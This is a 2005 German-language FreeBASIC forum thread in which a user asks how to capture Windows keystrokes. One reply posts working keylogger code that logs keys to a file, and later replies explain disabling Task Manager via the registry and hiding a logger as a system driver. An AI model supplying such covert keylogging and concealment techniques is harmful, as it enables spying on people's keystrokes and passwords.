Das deutsche QBasic- und FreeBASIC-Forum Foren-Übersicht Das deutsche QBasic- und FreeBASIC-Forum
Für euch erreichbar unter qb-forum.de, fb-forum.de und freebasic-forum.de!
 
FAQFAQ   SuchenSuchen   MitgliederlisteMitgliederliste   BenutzergruppenBenutzergruppen  RegistrierenRegistrieren
ProfilProfil   Einloggen, um private Nachrichten zu lesenEinloggen, um private Nachrichten zu lesen   LoginLogin
Zur Begleitseite des Forums / Chat / Impressum
Aktueller Forenpartner:

Windows tastatur Puffer

 
Neues Thema eröffnen   Neue Antwort erstellen    Das deutsche QBasic- und FreeBASIC-Forum Foren-Übersicht -> Allgemeine Fragen zu FreeBASIC.
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
psygate



Anmeldungsdatum: 05.04.2005
Beiträge: 304
Wohnort: Wien und der Computer

BeitragVerfasst am: 27.08.2005, 16:19    Titel: Windows tastatur Puffer Antworten mit Zitat

Hallo, weiss einer, wie i8ch den windows tastaturpuffer abhören/anzapfen kann? (In VB ging das...)
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Michael712
aka anfänger, programmierer


Anmeldungsdatum: 26.03.2005
Beiträge: 1593

BeitragVerfasst am: 27.08.2005, 20:57    Titel: Antworten mit Zitat

Ich habe mal so ein Programm geschrieben, dass mir erlaubt nacher alle gedrückten Tasten anzuzeigen.


Code:

Declare Function GetAsyncKeyState Lib "user32" ( _
      ByVal vKey As Long) As Integer

start=timer

do
    a=GetAsyncKeyState(27)
    if a <> 0 then end
loop until timer >= start+10
   
open "D:\test.txt" for append as #1

do
    for i = 5 to 255
        a=GetAsyncKeyState(i)
        if a <> 0 then print #1,CHR$(i);
        do: loop until getasynckeystate(i)=0
    next i
    a$=inkey$
loop until a$ <> "" ' So lange laufen, bis windows das Programm schließt

close #1
end


Nein, das brauche ich nicht um irgendeine Person auszuspionieren!!(habs nur mal so geschrieben)

Mfg
Michael
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
psygate



Anmeldungsdatum: 05.04.2005
Beiträge: 304
Wohnort: Wien und der Computer

BeitragVerfasst am: 27.08.2005, 22:34    Titel: Antworten mit Zitat

Ich brauche es eigentlich auch cniht zum spionieren, aber, es wäre eben nützlich, wenn amn sowas kann. lachen Ist immer gut, viel zu wissen.

PS: Gibts vielleicht auch was, um die Anwendung vor dem TaskManager zu verstecken? (nur so aus neugier lachen Aber langsa wird mein proggi wirklich ein spionage dingsda durchgeknallt )
PSS: kann man die alt oder strg oder entf taste blockieren?
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
noop



Anmeldungsdatum: 04.05.2005
Beiträge: 259

BeitragVerfasst am: 27.08.2005, 23:32    Titel: Antworten mit Zitat

Ich habs mal auf verschiedene Weisen probiert.
Hat nie geklappt. Ich glaub WIndows hat den Taskmanager so auf TOp stehen, dass es schwer ist ihn zu blocken.
Das einzige was mir gelungen ist was sobald Strg+Alt+Entf gedrückt wurde den PC runterzufahren oder den User abzumelden.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Devilkevin
aka Kerstin


Anmeldungsdatum: 11.11.2004
Beiträge: 2532
Wohnort: nähe Mannheim

BeitragVerfasst am: 28.08.2005, 09:59    Titel: Antworten mit Zitat

psygate hat Folgendes geschrieben:


PS: Gibts vielleicht auch was, um die Anwendung vor dem TaskManager zu verstecken? (nur so aus neugier lachen Aber langsa wird mein proggi wirklich ein spionage dingsda durchgeknallt )
PSS: kann man die alt oder strg oder entf taste blockieren?


Das sieht aber sehr nach nem Keylogger aus durchgeknallt
Aus der Taskleiste verschwinden lassen geht bestimmt, aber den Prozzes im Taskmanager "unsichtbar"zu machen wird seeehr schwierig.
_________________
www.piratenpartei.de
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
Johannes



Anmeldungsdatum: 28.08.2005
Beiträge: 3
Wohnort: Recklinghausen

BeitragVerfasst am: 28.08.2005, 14:48    Titel: Antworten mit Zitat

Hi psygate,

Zitat:
PSS: kann man die alt oder strg oder entf taste blockieren?


Es gibt einen Registry-Schlüssel, mit dem man den Task-Manager blockieren kann. Dan gibt Windows falls man Strg + Alt + Entf drückt eine Warnmeldung aus

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

Einfach einen DWORD-WERT "DisableTaskMgr" erstellen und den Wert auf 1 setzen.

Ich hoffe das bringt dich weiter.

Gruß,
Johannes
_________________
Computer sind phantastisch: in wenigen
Minuten können sie einen so großen Fehler
produzieren, den Menschen nur in vielen
Monaten machen könnten.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Sebastian
Administrator


Anmeldungsdatum: 10.09.2004
Beiträge: 5969
Wohnort: Deutschland

BeitragVerfasst am: 28.08.2005, 15:04    Titel: Antworten mit Zitat

Unter Windows NT, 2000, XP kannst du vor'm Taskmanager außer Systemtreibern nichts verstecken. Man könnte vielleicht versuchen, einen Keylogger als SYS als Gerät zu installieren. Dann dürfte man im Taskmanager nichts davon sehen. Mit EXE Dateien geht das aber niemals.
_________________

Die gefährlichsten Familienclans | Opas Leistung muss sich wieder lohnen - für 6 bis 10 Generationen!
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
Dusky_Joe



Anmeldungsdatum: 07.01.2005
Beiträge: 1007
Wohnort: Regensburg/Oberpfalz

BeitragVerfasst am: 29.08.2005, 12:01    Titel: Antworten mit Zitat

Es gibt eine relativ einfache Methode, für die man sich allerdings mit Pointern auskennen sollte.
(Wer sich damit noch nicht auskennt:
http://fb.exp-soft.de/FBtuts.php?zeig=tuts&view=Referenz_Grundlagen-4.~Pointer.txt
)

Mit @ kann man bequem die Adresse von INKEY$ hearusfinden. Also:
Code:
DIM AS STRING * 2 Sign
DIM AS USHORT PTR Adresse
Adresse = @INKEY$

Sign = MKSHORT$(*Adresse)



//EDIT: Funzt doch ned. @INKEY$ gibt nur die Adresse der Funktion INKEY$ aus, und keinen Pointer auf den Puffer... Trotzdem vllt ganz interessant zwinkern
_________________
fully biological degradable

Once, the big wave arrives, you've got two ways, you can go:
Either, you ride it, or you don't do.
But, if you don't ride, you'll never know wether you'd have gone wet.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
psygate



Anmeldungsdatum: 05.04.2005
Beiträge: 304
Wohnort: Wien und der Computer

BeitragVerfasst am: 29.08.2005, 13:02    Titel: Antworten mit Zitat

Ich will mal ehrlich sein, JA, ich will unter anderem einen Keylogger schreiben, aber nciht um andere zu spionieren, sondern um meine eigenen fähigkeiten im programmieren zu erweitern und um mehr über die funktionsweise von windos zu erfahren. *ganehrlichbin* Außerdem wäre es wichtig, da ich wissen will, welche tastaturanschläge wirklich durchs system laufen. Also, danke für eure hilfe, wenn noch wer was hat, dann bitte lachen durchgeknallt
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Beiträge der letzten Zeit anzeigen:   
Neues Thema eröffnen   Neue Antwort erstellen    Das deutsche QBasic- und FreeBASIC-Forum Foren-Übersicht -> Allgemeine Fragen zu FreeBASIC. Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 
Gehe zu:  
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.

 Impressum :: Datenschutz